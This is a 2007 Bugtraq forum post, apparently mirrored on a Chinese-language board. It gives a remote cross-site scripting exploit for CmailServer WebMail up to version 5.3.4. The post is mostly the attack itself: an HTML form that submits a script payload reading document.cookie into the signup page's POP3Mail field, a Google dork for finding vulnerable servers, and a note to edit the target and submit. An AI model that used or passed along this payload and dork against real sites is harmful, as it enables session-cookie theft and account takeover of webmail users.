CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit

看板Bugtraq作者時間19年前 (2007/04/08 03:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
<html> <head> <script> //'=============================================================================================== //'[Script Name: CmailServer WebMail <= V.5.3.4 (signup) Remote XSS Exploit //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[Dork : "inurl:/mail/signup.asp" //'[Dork Ex. : http://www.google.com.tr/search?q=inurl:/mail/signup.asp&hl=tr&start=0&sa=N //'[S.Page : http://www.youngzsoft.net/ //'[Using : Please "action" edit and submit //'=============================================================================================== </script> </head> <title>Cmail XSS </title> <body> <Form Method="Post" Action="[target]/signup.asp"> <Input Type=Hidden Name=Signup Value="0"> <input type="hidden" name="Account" size="30"> <Input Type="hidden" Name="Pass" size="30" value=""> <Input Type="hidden" Name="RePass" size="30" value=""> <input type="hidden" name="UserName" size="30" value=""> <Input type="hidden" Name="Comment" size="30" value=""> <Input Name="POP3Mail" size="30" value="<script>JavaScript:alert(document.cookie);</script>"> <Input Type="Submit" Value="Submit XSS"> </Form> </body> </html>
文章代碼(AID): #165-gA00 (Bugtraq)